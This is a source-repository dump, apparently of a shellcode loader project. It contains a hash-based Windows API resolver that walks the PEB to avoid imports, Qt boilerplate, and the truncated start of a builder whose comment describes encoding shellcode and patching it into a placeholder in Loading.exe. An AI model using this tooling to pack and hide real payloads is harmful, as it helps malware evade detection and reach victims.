Case-sensitive unless LAZY_IMPORTER_CASE_INSENSITIVE is defined. */ template 288 | LAZY_IMPORTER_FORCEINLINE unsigned hash(const CharT* str, unsigned offset) noexcept 289 | { 290 | unsigned value = offset; 291 | 292 | for(;;) { 293 | char c = *str++; 294 | if(!c) 295 | return value; 296 | value = hash_single(value, c); 297 | } 298 | } 299 | 300 | /* Hashes a counted UTF-16 string such as BaseDllName. Length is a byte count, hence the division by sizeof(wchar_t); each unit is narrowed to char, so a module name hashes as the low byte of each code unit. Does not depend on NUL termination. */ LAZY_IMPORTER_FORCEINLINE unsigned hash( 301 | const win::UNICODE_STRING_T& str, unsigned offset) noexcept 302 | { 303 | auto first = str.Buffer; 304 | const auto last = first + (str.Length / sizeof(wchar_t)); 305 | auto value = offset; 306 | for(; first != last; ++first) 307 | value = hash_single(value, static_cast(*first)); 308 | 309 | return value; 310 | } 311 | 312 | /* Splits a forwarder string of the form "MODULE.Function" at the first '.', hashing both halves with the same seed. The first loop has no NUL check, so a string without a '.' is scanned past its end; callers must only pass strings that exports_directory::is_forwarded() located inside an export directory. NOTE(review): `*str && *str != '.'` would be a cheap guard. */ LAZY_IMPORTER_FORCEINLINE forwarded_hashes hash_forwarded( 313 | const char* str, unsigned offset) noexcept 314 | { 315 | forwarded_hashes res{ offset, offset }; 316 | 317 | for(; *str != '.'; ++str) 318 | res.module_hash = hash_single(res.module_hash, *str); 319 | 320 | ++str; 321 | 322 | for(; *str; ++str) 323 | res.function_hash = hash_single(res.function_hash, *str); 324 | 325 | return res; 326 | } 327 | 328 | // some helper functions 329 | /* Reads the PEB pointer directly from the TEB via compiler intrinsics (gs:0x60 on x64, fs:0x30 on x86, thread register + 0x30/0x60 on ARM/ARM64/IA64) — no Win32 call is made or imported for this. */ LAZY_IMPORTER_FORCEINLINE const win::PEB_T* peb() noexcept 330 | { 331 | #if defined(_M_X64) || defined(__amd64__) 332 | return reinterpret_cast(__readgsqword(0x60)); 333 | #elif defined(_M_IX86) || defined(__i386__) 334 | return reinterpret_cast(__readfsdword(0x30)); 335 | #elif defined(_M_ARM) || defined(__arm__) 336 | return *reinterpret_cast(_MoveFromCoprocessor(15, 0, 13, 0, 2) + 0x30); 337 | #elif defined(_M_ARM64) || defined(__aarch64__) 338 | return *reinterpret_cast(__getReg(18) + 0x60); 339 | #elif defined(_M_IA64) || defined(__ia64__) 340 | return *reinterpret_cast(static_cast(_rdteb()) 
+ 0x60); 341 | #else 342 | #error Unsupported platform. Open an issue and I'll probably add support. 343 | #endif 344 | } 345 | 346 | LAZY_IMPORTER_FORCEINLINE const win::PEB_LDR_DATA_T* ldr() 347 | { 348 | return reinterpret_cast(peb()->Ldr); 349 | } 350 | 351 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_NT_HEADERS* nt_headers( 352 | const char* base) noexcept 353 | { 354 | return reinterpret_cast( 355 | base + reinterpret_cast(base)->e_lfanew); 356 | } 357 | 358 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* image_export_dir( 359 | const char* base) noexcept 360 | { 361 | return reinterpret_cast( 362 | base + nt_headers(base)->OptionalHeader.DataDirectory->VirtualAddress); 363 | } 364 | 365 | LAZY_IMPORTER_FORCEINLINE const win::LDR_DATA_TABLE_ENTRY_T* ldr_data_entry() noexcept 366 | { 367 | return reinterpret_cast( 368 | ldr()->InLoadOrderModuleList.Flink); 369 | } 370 | 371 | struct exports_directory { 372 | const char* _base; 373 | const win::IMAGE_EXPORT_DIRECTORY* _ied; 374 | unsigned long _ied_size; 375 | 376 | public: 377 | using size_type = unsigned long; 378 | 379 | LAZY_IMPORTER_FORCEINLINE 380 | exports_directory(const char* base) noexcept : _base(base) 381 | { 382 | const auto ied_data_dir = nt_headers(base)->OptionalHeader.DataDirectory[0]; 383 | _ied = reinterpret_cast( 384 | base + ied_data_dir.VirtualAddress); 385 | _ied_size = ied_data_dir.Size; 386 | } 387 | 388 | LAZY_IMPORTER_FORCEINLINE explicit operator bool() const noexcept 389 | { 390 | return reinterpret_cast(_ied) != _base; 391 | } 392 | 393 | LAZY_IMPORTER_FORCEINLINE size_type size() const noexcept 394 | { 395 | return _ied->NumberOfNames; 396 | } 397 | 398 | LAZY_IMPORTER_FORCEINLINE const char* base() const noexcept { return _base; } 399 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* ied() const noexcept 400 | { 401 | return _ied; 402 | } 403 | 404 | LAZY_IMPORTER_FORCEINLINE const char* name(size_type index) const noexcept 405 | { 406 | return 
reinterpret_cast( 407 | _base + reinterpret_cast( 408 | _base + _ied->AddressOfNames)[index]); 409 | } 410 | 411 | /* Resolves the export at name-table position `index`: its ordinal comes from AddressOfNameOrdinals, the RVA from AddressOfFunctions. `index` is not bounds-checked against size() (NumberOfNames); callers must stay below it. For a forwarder export the RVA points back into the export directory at a "MODULE.Function" string rather than at code — that is what is_forwarded() detects. */ LAZY_IMPORTER_FORCEINLINE const char* address(size_type index) const noexcept 412 | { 413 | const auto* const rva_table = 414 | reinterpret_cast(_base + _ied->AddressOfFunctions); 415 | 416 | const auto* const ord_table = reinterpret_cast( 417 | _base + _ied->AddressOfNameOrdinals); 418 | 419 | return _base + rva_table[ord_table[index]]; 420 | } 421 | 422 | /* True when `export_address` lies strictly inside (_ied, _ied + _ied_size), i.e. the export is a forwarder and the bytes there are a string, not code. The lower bound is exclusive, so an address equal to _ied itself is not reported as forwarded. */ LAZY_IMPORTER_FORCEINLINE bool is_forwarded( 423 | const char* export_address) const noexcept 424 | { 425 | const auto ui_ied = reinterpret_cast(_ied); 426 | return (export_address > ui_ied && export_address < ui_ied + _ied_size); 427 | } 428 | }; 429 | 430 | /* Bounded walk over the PEB InLoadOrderModuleList. The walk starts at the entry AFTER `ldr` (by default after ldr_data_entry(), so the first list entry is skipped), and next() reports false once it either returns to that starting entry or reaches an entry whose DllBase is null. NOTE(review): the null-DllBase test is presumably what stops the walk at the list-head sentinel, which is not a real LDR_DATA_TABLE_ENTRY — confirm against the PEB_LDR_DATA layout before relying on it. reset() repositions to the entry after `head`, not to `head` itself, and every `do { … } while(e.next())` caller advances once more before examining an entry. */ struct safe_module_enumerator { 431 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T; 432 | value_type* value; 433 | value_type* head; 434 | 435 | LAZY_IMPORTER_FORCEINLINE safe_module_enumerator() noexcept 436 | : safe_module_enumerator(ldr_data_entry()) 437 | {} 438 | 439 | LAZY_IMPORTER_FORCEINLINE 440 | safe_module_enumerator(const detail::win::LDR_DATA_TABLE_ENTRY_T* ldr) noexcept 441 | : value(ldr->load_order_next()), head(value) 442 | {} 443 | 444 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept 445 | { 446 | value = head->load_order_next(); 447 | } 448 | 449 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept 450 | { 451 | value = value->load_order_next(); 452 | 453 | return value != head && value->DllBase; 454 | } 455 | }; 456 | 457 | /* Unbounded walk over the same list: next() always returns true, so a `do { … } while(e.next())` built on this enumerator can only exit by finding a match. On a miss it keeps following Flink around the (circular) loader list, including the list-head sentinel whose DllBase is not a module base, and dereferences whatever it finds. Use it only when the hashed export is known to be present in a loaded module; the *_safe variants use safe_module_enumerator instead. reset() returns to ldr_data_entry() itself (the first entry), unlike the safe enumerator. */ struct unsafe_module_enumerator { 458 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T*; 459 | value_type value; 460 | 461 | LAZY_IMPORTER_FORCEINLINE unsafe_module_enumerator() noexcept 462 | : value(ldr_data_entry()) 463 | {} 464 | 465 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept { value = ldr_data_entry(); } 466 | 467 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept 468 | { 469 | value = value->load_order_next(); 470 | return true; 471 | } 472 | }; 473 | 474 | // provides 
the cached functions which use Derive classes methods 475 | template 476 | class lazy_base { 477 | protected: 478 | // This function is needed because every templated function 479 | // with different args has its own static buffer 480 | LAZY_IMPORTER_FORCEINLINE static void*& _cache() noexcept 481 | { 482 | static void* value = nullptr; 483 | return value; 484 | } 485 | 486 | public: 487 | template 488 | LAZY_IMPORTER_FORCEINLINE static T safe() noexcept 489 | { 490 | return Derived::template get(); 491 | } 492 | 493 | template 494 | LAZY_IMPORTER_FORCEINLINE static T cached() noexcept 495 | { 496 | auto& cached = _cache(); 497 | if(!cached) 498 | cached = Derived::template get(); 499 | 500 | return (T)(cached); 501 | } 502 | 503 | template 504 | LAZY_IMPORTER_FORCEINLINE static T safe_cached() noexcept 505 | { 506 | return cached(); 507 | } 508 | }; 509 | 510 | template 511 | struct lazy_module : lazy_base> { 512 | template 513 | LAZY_IMPORTER_FORCEINLINE static T get() noexcept 514 | { 515 | Enum e; 516 | do { 517 | if(hash(e.value->BaseDllName, get_offset(OHP)) == get_hash(OHP)) 518 | return (T)(e.value->DllBase); 519 | } while(e.next()); 520 | return {}; 521 | } 522 | 523 | template 524 | LAZY_IMPORTER_FORCEINLINE static T in(Ldr ldr) noexcept 525 | { 526 | safe_module_enumerator e((const detail::win::LDR_DATA_TABLE_ENTRY_T*)(ldr)); 527 | do { 528 | if(hash(e.value->BaseDllName, get_offset(OHP)) == get_hash(OHP)) 529 | return (T)(e.value->DllBase); 530 | } while(e.next()); 531 | return {}; 532 | } 533 | 534 | template 535 | LAZY_IMPORTER_FORCEINLINE static T in_cached(Ldr ldr) noexcept 536 | { 537 | auto& cached = lazy_base>::_cache(); 538 | if(!cached) 539 | cached = in(ldr); 540 | 541 | return (T)(cached); 542 | } 543 | }; 544 | 545 | template 546 | struct lazy_function : lazy_base, T> { 547 | using base_type = lazy_base, T>; 548 | 549 | template 550 | LAZY_IMPORTER_FORCEINLINE decltype(auto) operator()(Args&&... 
args) const 551 | { 552 | #ifndef LAZY_IMPORTER_CACHE_OPERATOR_PARENS 553 | return get()(LAZY_IMPORTER_CPP_FORWARD(Args, args)...); 554 | #else 555 | return this->cached()(LAZY_IMPORTER_CPP_FORWARD(Args, args)...); 556 | #endif 557 | } 558 | 559 | /* Resolves the export whose hashed name equals get_hash(OHP) by walking every loaded module (Enum picks the walk — see safe_/unsafe_module_enumerator) and scanning each module's export-name table from the last name backwards; nothing is imported (no GetProcAddress/LoadLibrary), the PEB and export tables are read directly. The first module in load order that exports a matching name wins, so a name exported by several DLLs resolves to the earliest loaded one. Returns {} only when Enum can exhaust the list; with the unbounded enumerator a miss never returns. */ template 560 | LAZY_IMPORTER_FORCEINLINE static F get() noexcept 561 | { 562 | // for backwards compatibility. 563 | // Before 2.0 it was only possible to resolve forwarded exports when 564 | // this macro was enabled 565 | #ifdef LAZY_IMPORTER_RESOLVE_FORWARDED_EXPORTS 566 | return forwarded(); 567 | #else 568 | 569 | Enum e; 570 | 571 | do { 572 | #ifdef LAZY_IMPORTER_HARDENED_MODULE_CHECKS 573 | /* `continue` inside do/while jumps to the e.next() test, so an entry with no base or no name is skipped rather than dereferenced. */ if(!e.value->DllBase || !e.value->FullDllName.Length) 574 | continue; 575 | #endif 576 | 577 | const exports_directory exports(e.value->DllBase); 578 | 579 | if(exports) { 580 | auto export_index = exports.size(); 581 | while(export_index--) 582 | if(hash(exports.name(export_index), get_offset(OHP)) == get_hash(OHP)) 583 | return (F)(exports.address(export_index)); 584 | } 585 | } while(e.next()); 586 | return {}; 587 | #endif 588 | } 589 | 590 | /* Like get(), but follows forwarder exports: when the matched export is a "MODULE.Function" string (is_forwarded()), the hash pair is replaced by hash_forwarded() of that string and the module walk restarts, now restricted to the module whose BaseDllName minus its last four characters hashes to module_hash. NOTE(review): after e.reset() the `break` leaves only the inner while, and the trailing e.next() advances once more before any entry is examined, so the restarted walk begins two entries past the enumerator's head (safe) or one past ldr_data_entry() (unsafe) — verify the forwarded-to module is not among the skipped entries. Forwarder strings commonly spell the module in upper case while BaseDllName may not; with the default case-sensitive hash_single the module hashes only match when casing agrees (see LAZY_IMPORTER_CASE_INSENSITIVE in the FAQ at the top of this file). */ template 591 | LAZY_IMPORTER_FORCEINLINE static F forwarded() noexcept 592 | { 593 | detail::win::UNICODE_STRING_T name; 594 | forwarded_hashes hashes{ 0, get_hash(OHP) }; 595 | 596 | Enum e; 597 | do { 598 | name = e.value->BaseDllName; 599 | /* Length is a byte count (unsigned short); 8 bytes = four UTF-16 units, assumed to be ".dll". A BaseDllName shorter than four characters would wrap Length and make hash() read past the buffer. NOTE(review): a `Length >= 8` guard would be cheap. */ name.Length -= 8; // get rid of .dll extension 600 | 601 | if(!hashes.module_hash || hash(name, get_offset(OHP)) == hashes.module_hash) { 602 | const exports_directory exports(e.value->DllBase); 603 | 604 | if(exports) { 605 | auto export_index = exports.size(); 606 | while(export_index--) 607 | if(hash(exports.name(export_index), get_offset(OHP)) == hashes.function_hash) { 608 | const auto addr = exports.address(export_index); 609 | 610 | if(exports.is_forwarded(addr)) { 611 | hashes = hash_forwarded( 612 | reinterpret_cast(addr), 613 | get_offset(OHP)); 614 | 615 | e.reset(); 616 | break; 617 | } 618 | return (F)(addr); 619 | } 620 | } 621 | } 
622 | } while(e.next()); 623 | return {}; 624 | } 625 | 626 | template 627 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe() noexcept 628 | { 629 | return forwarded(); 630 | } 631 | 632 | /* Memoises the resolved pointer in lazy_base::_cache(), a single function-local static per lazy_function instantiation (shared by cached(), forwarded_cached() and in_cached() of the same OHP/T). A null result is not remembered — the `if(!value)` retries on every call — and the store is unsynchronized, so two threads resolving concurrently may both perform the lookup and both write the same value. */ template 633 | LAZY_IMPORTER_FORCEINLINE static F forwarded_cached() noexcept 634 | { 635 | auto& value = base_type::_cache(); 636 | if(!value) 637 | value = forwarded(); 638 | return (F)(value); 639 | } 640 | 641 | template 642 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe_cached() noexcept 643 | { 644 | return forwarded_cached(); 645 | } 646 | 647 | /* Looks the export up in one specific module `m` instead of walking the loader list, scanning the name table forward from index 0 (the opposite direction from get()). IsSafe gates every check: with it false there is no null test on `m`, no test that the module has an export directory, and the for loop has no upper bound — an export that is not present makes name(i) read past the name table. Prefer in_safe()/nt_safe() unless the export is guaranteed to exist. */ template 648 | LAZY_IMPORTER_FORCEINLINE static F in(Module m) noexcept 649 | { 650 | if(IsSafe && !m) 651 | return {}; 652 | 653 | const exports_directory exports((const char*)(m)); 654 | if(IsSafe && !exports) 655 | return {}; 656 | 657 | for(unsigned long i{};; ++i) { 658 | if(IsSafe && i == exports.size()) 659 | break; 660 | 661 | if(hash(exports.name(i), get_offset(OHP)) == get_hash(OHP)) 662 | return (F)(exports.address(i)); 663 | } 664 | return {}; 665 | } 666 | 667 | template 668 | LAZY_IMPORTER_FORCEINLINE static F in_safe(Module m) noexcept 669 | { 670 | return in(m); 671 | } 672 | 673 | /* Same memoisation as forwarded_cached(). The cache slot is keyed by the instantiation, not by `m`: a later call with a different module returns whatever the first successful call stored. */ template 674 | LAZY_IMPORTER_FORCEINLINE static F in_cached(Module m) noexcept 675 | { 676 | auto& value = base_type::_cache(); 677 | if(!value) 678 | value = in(m); 679 | return (F)(value); 680 | } 681 | 682 | template 683 | LAZY_IMPORTER_FORCEINLINE static F in_safe_cached(Module m) noexcept 684 | { 685 | return in_cached(m); 686 | } 687 | 688 | /* Looks up in the second entry of the load-order list (ldr_data_entry()->load_order_next()); the name suggests this is expected to be ntdll.dll, but nothing verifies which module that entry is, and nt() inherits in()'s unbounded scan. */ template 689 | LAZY_IMPORTER_FORCEINLINE static F nt() noexcept 690 | { 691 | return in(ldr_data_entry()->load_order_next()->DllBase); 692 | } 693 | 694 | template 695 | LAZY_IMPORTER_FORCEINLINE static F nt_safe() noexcept 696 | { 697 | return in_safe(ldr_data_entry()->load_order_next()->DllBase); 698 | } 699 | 700 | template 701 | LAZY_IMPORTER_FORCEINLINE static F nt_cached() noexcept 702 | { 703 | return in_cached(ldr_data_entry()->load_order_next()->DllBase); 704 | } 705 | 706 | 
template 707 | LAZY_IMPORTER_FORCEINLINE static F nt_safe_cached() noexcept 708 | { 709 | return in_safe_cached(ldr_data_entry()->load_order_next()->DllBase); 710 | } 711 | }; 712 | 713 | }} // namespace li::detail 714 | 715 | #endif // include guard 716 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/main.cpp: -------------------------------------------------------------------------------- 1 | #include "Loading.h" 2 | #include 3 | 4 | int main(int argc, char *argv[]) 5 | { 6 | QApplication a(argc, argv); 7 | Loading w; 8 | w.show(); 9 | return a.exec(); 10 | } 11 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/moc/moc_Loading.cpp: -------------------------------------------------------------------------------- 1 | /**************************************************************************** 2 | ** Meta object code from reading C++ file 'Loading.h' 3 | ** 4 | ** Created by: The Qt Meta Object Compiler version 67 (Qt 5.12.9) 5 | ** 6 | ** WARNING! All changes made in this file will be lost! 7 | *****************************************************************************/ 8 | 9 | #include "../../Loading.h" 10 | #include 11 | #include 12 | #if !defined(Q_MOC_OUTPUT_REVISION) 13 | #error "The header file 'Loading.h' doesn't include ." 14 | #elif Q_MOC_OUTPUT_REVISION != 67 15 | #error "This file was generated using the moc from 5.12.9. It" 16 | #error "cannot be used with the include files from this version of Qt." 
17 | #error "(The moc has changed too much.)" 18 | #endif 19 | 20 | QT_BEGIN_MOC_NAMESPACE 21 | QT_WARNING_PUSH 22 | QT_WARNING_DISABLE_DEPRECATED 23 | struct qt_meta_stringdata_Loading_t { 24 | QByteArrayData data[1]; 25 | char stringdata0[8]; 26 | }; 27 | #define QT_MOC_LITERAL(idx, ofs, len) \ 28 | Q_STATIC_BYTE_ARRAY_DATA_HEADER_INITIALIZER_WITH_OFFSET(len, \ 29 | qptrdiff(offsetof(qt_meta_stringdata_Loading_t, stringdata0) + ofs \ 30 | - idx * sizeof(QByteArrayData)) \ 31 | ) 32 | static const qt_meta_stringdata_Loading_t qt_meta_stringdata_Loading = { 33 | { 34 | QT_MOC_LITERAL(0, 0, 7) // "Loading" 35 | 36 | }, 37 | "Loading" 38 | }; 39 | #undef QT_MOC_LITERAL 40 | 41 | static const uint qt_meta_data_Loading[] = { 42 | 43 | // content: 44 | 8, // revision 45 | 0, // classname 46 | 0, 0, // classinfo 47 | 0, 0, // methods 48 | 0, 0, // properties 49 | 0, 0, // enums/sets 50 | 0, 0, // constructors 51 | 0, // flags 52 | 0, // signalCount 53 | 54 | 0 // eod 55 | }; 56 | 57 | void Loading::qt_static_metacall(QObject *_o, QMetaObject::Call _c, int _id, void **_a) 58 | { 59 | Q_UNUSED(_o); 60 | Q_UNUSED(_id); 61 | Q_UNUSED(_c); 62 | Q_UNUSED(_a); 63 | } 64 | 65 | QT_INIT_METAOBJECT const QMetaObject Loading::staticMetaObject = { { 66 | &QMainWindow::staticMetaObject, 67 | qt_meta_stringdata_Loading.data, 68 | qt_meta_data_Loading, 69 | qt_static_metacall, 70 | nullptr, 71 | nullptr 72 | } }; 73 | 74 | 75 | const QMetaObject *Loading::metaObject() const 76 | { 77 | return QObject::d_ptr->metaObject ? 
QObject::d_ptr->dynamicMetaObject() : &staticMetaObject; 78 | } 79 | 80 | void *Loading::qt_metacast(const char *_clname) 81 | { 82 | if (!_clname) return nullptr; 83 | if (!strcmp(_clname, qt_meta_stringdata_Loading.stringdata0)) 84 | return static_cast(this); 85 | return QMainWindow::qt_metacast(_clname); 86 | } 87 | 88 | int Loading::qt_metacall(QMetaObject::Call _c, int _id, void **_a) 89 | { 90 | _id = QMainWindow::qt_metacall(_c, _id, _a); 91 | return _id; 92 | } 93 | QT_WARNING_POP 94 | QT_END_MOC_NAMESPACE 95 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/rcc/qrc_Loading.cpp: -------------------------------------------------------------------------------- 1 | /**************************************************************************** 2 | ** Resource object code 3 | ** 4 | ** Created by: The Resource Compiler for Qt version 5.12.9 5 | ** 6 | ** WARNING! All changes made in this file will be lost! 7 | *****************************************************************************/ 8 | 9 | #ifdef QT_NAMESPACE 10 | # define QT_RCC_PREPEND_NAMESPACE(name) ::QT_NAMESPACE::name 11 | # define QT_RCC_MANGLE_NAMESPACE0(x) x 12 | # define QT_RCC_MANGLE_NAMESPACE1(a, b) a##_##b 13 | # define QT_RCC_MANGLE_NAMESPACE2(a, b) QT_RCC_MANGLE_NAMESPACE1(a,b) 14 | # define QT_RCC_MANGLE_NAMESPACE(name) QT_RCC_MANGLE_NAMESPACE2( \ 15 | QT_RCC_MANGLE_NAMESPACE0(name), QT_RCC_MANGLE_NAMESPACE0(QT_NAMESPACE)) 16 | #else 17 | # define QT_RCC_PREPEND_NAMESPACE(name) name 18 | # define QT_RCC_MANGLE_NAMESPACE(name) name 19 | #endif 20 | 21 | #ifdef QT_NAMESPACE 22 | namespace QT_NAMESPACE { 23 | #endif 24 | 25 | #ifdef QT_NAMESPACE 26 | } 27 | #endif 28 | 29 | int QT_RCC_MANGLE_NAMESPACE(qInitResources_Loading)(); 30 | int QT_RCC_MANGLE_NAMESPACE(qInitResources_Loading)() 31 | { 32 | return 1; 33 | } 34 | 35 | int QT_RCC_MANGLE_NAMESPACE(qCleanupResources_Loading)(); 36 | int QT_RCC_MANGLE_NAMESPACE(qCleanupResources_Loading)() 
37 | { 38 | return 1; 39 | } 40 | 41 | namespace { 42 | struct initializer { 43 | initializer() { QT_RCC_MANGLE_NAMESPACE(qInitResources_Loading)(); } 44 | ~initializer() { QT_RCC_MANGLE_NAMESPACE(qCleanupResources_Loading)(); } 45 | } dummy; 46 | } 47 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/uic/ui_Loading.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | ** Form generated from reading UI file 'Loading.ui' 3 | ** 4 | ** Created by: Qt User Interface Compiler version 5.12.9 5 | ** 6 | ** WARNING! All changes made in this file will be lost when recompiling UI file! 7 | ********************************************************************************/ 8 | 9 | #ifndef UI_LOADING_H 10 | #define UI_LOADING_H 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | QT_BEGIN_NAMESPACE 21 | 22 | class Ui_LoadingClass 23 | { 24 | public: 25 | QMenuBar *menuBar; 26 | QToolBar *mainToolBar; 27 | QWidget *centralWidget; 28 | QStatusBar *statusBar; 29 | 30 | void setupUi(QMainWindow *LoadingClass) 31 | { 32 | if (LoadingClass->objectName().isEmpty()) 33 | LoadingClass->setObjectName(QString::fromUtf8("LoadingClass")); 34 | LoadingClass->resize(600, 400); 35 | menuBar = new QMenuBar(LoadingClass); 36 | menuBar->setObjectName(QString::fromUtf8("menuBar")); 37 | LoadingClass->setMenuBar(menuBar); 38 | mainToolBar = new QToolBar(LoadingClass); 39 | mainToolBar->setObjectName(QString::fromUtf8("mainToolBar")); 40 | LoadingClass->addToolBar(mainToolBar); 41 | centralWidget = new QWidget(LoadingClass); 42 | centralWidget->setObjectName(QString::fromUtf8("centralWidget")); 43 | LoadingClass->setCentralWidget(centralWidget); 44 | statusBar = new QStatusBar(LoadingClass); 45 | statusBar->setObjectName(QString::fromUtf8("statusBar")); 46 | 
LoadingClass->setStatusBar(statusBar); 47 | 48 | retranslateUi(LoadingClass); 49 | 50 | QMetaObject::connectSlotsByName(LoadingClass); 51 | } // setupUi 52 | 53 | void retranslateUi(QMainWindow *LoadingClass) 54 | { 55 | LoadingClass->setWindowTitle(QApplication::translate("LoadingClass", "Loading", nullptr)); 56 | } // retranslateUi 57 | 58 | }; 59 | 60 | namespace Ui { 61 | class LoadingClass: public Ui_LoadingClass {}; 62 | } // namespace Ui 63 | 64 | QT_END_NAMESPACE 65 | 66 | #endif // UI_LOADING_H 67 | -------------------------------------------------------------------------------- /Loading_1.2/res/Loading.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Loading_1.2/res/Loading.ico -------------------------------------------------------------------------------- /Readme/Result-01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/Result-01.png -------------------------------------------------------------------------------- /Readme/Result-02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/Result-02.png -------------------------------------------------------------------------------- /Readme/Result-03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/Result-03.png -------------------------------------------------------------------------------- /Readme/Result-04.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/Result-04.png -------------------------------------------------------------------------------- /Readme/ShellQMaker-Files-001.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/ShellQMaker-Files-001.png -------------------------------------------------------------------------------- /Readme/shellQMaker-Instructions-001.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/shellQMaker-Instructions-001.png -------------------------------------------------------------------------------- /Readme/shellQMaker-Instructions-002.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/shellQMaker-Instructions-002.png -------------------------------------------------------------------------------- /Readme/shellQMaker-Instructions-003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/shellQMaker-Instructions-003.png -------------------------------------------------------------------------------- /Readme/shellQMaker-Instructions-004.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Readme/shellQMaker-Instructions-004.png -------------------------------------------------------------------------------- /ShellQMaker/ShellQMaker.sln: 
--------------------------------------------------------------------------------

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.4.33110.190
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ShellQMaker", "ShellQMaker.vcxproj", "{10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|x64 = Debug|x64
		Debug|x86 = Debug|x86
		Release|x64 = Release|x64
		Release|x86 = Release|x86
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Debug|x64.ActiveCfg = Debug|x64
		{10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Debug|x64.Build.0 = Debug|x64
		{10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Debug|x86.ActiveCfg = Debug|Win32
		{10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Debug|x86.Build.0 = Debug|Win32
		{10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Release|x64.ActiveCfg = Release|x64
		{10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Release|x64.Build.0 = Release|x64
		{10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Release|x86.ActiveCfg = Release|Win32
		{10DDDEB3-0C2A-40FD-99F6-D82CB46458CC}.Release|x86.Build.0 = Release|Win32
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {3C5B6D70-5C1E-4BF8-9DD8-D09F81751392}
	EndGlobalSection
EndGlobal
--------------------------------------------------------------------------------
/ShellQMaker/ShellQMaker/ShellQMaker.cpp:
--------------------------------------------------------------------------------
#pragma once  // NOTE(review): has no effect in a .cpp translation unit; harmless but misleading
#include "wx/wxprec.h"
#include   // NOTE(review): angle-bracket header name was lost in extraction; cannot be recovered from here
#include "ShellQMaker.h"

using namespace std;




// Builder entry point for ShellQMaker.
//
// Usage (see the else-branch below): ShellQMaker.exe <payload.bin> <outfile.exe>
//   argv[1]  raw shellcode file
//   argv[2]  path of the executable to produce
//   envp     unused
//
// What this function visibly does:
//   1. reads argv[1] into memory and applies a per-byte transform
//      (b = ((b ^ (i + 1)) + 1) mod 256, i = byte index);
//   2. reads "Loading.exe" from the current working directory;
//   3. scans it for a run of more than 0x42 consecutive 0x41 bytes (the placeholder);
//   4. overwrites the start of that run with the payload length (4 bytes, native
//      byte order) followed by the transformed payload;
//   5. writes the patched image to argv[2].
// The code that consumes the placeholder (the loader) is not visible here.
//
// NOTE(review): main.h declares `int main();` and MyApp::OnInit calls `main()`
// with no arguments, while this definition takes three parameters. How that call
// resolves to this definition, and what argc/argv hold when it does, is not
// visible here — confirm the build links and that argc/argv are the real
// command line before trusting the argc == 3 branch.
int main(int argc, char* argv[], char* envp[])
{
	wxPrintf(" _________.__ .__ .__ ________ _____ __ \r\n");
	wxPrintf(" / _____/| |__ ____ | | | | \\_____ \\ / \\ _____ | | __ ___________ \r\n");
	wxPrintf(" \\_____ \\ | | \\_/ __ \\| | | | / / \\ \\ / \\ / \\__ \\ | |/ // __ \\_ __ \\ \r\n");
	wxPrintf(" / \\| Y \\ ___/| |_| |__/ \\_/. \\/ Y \\/ __ \\| <\\ ___/| | \\/ \r\n");
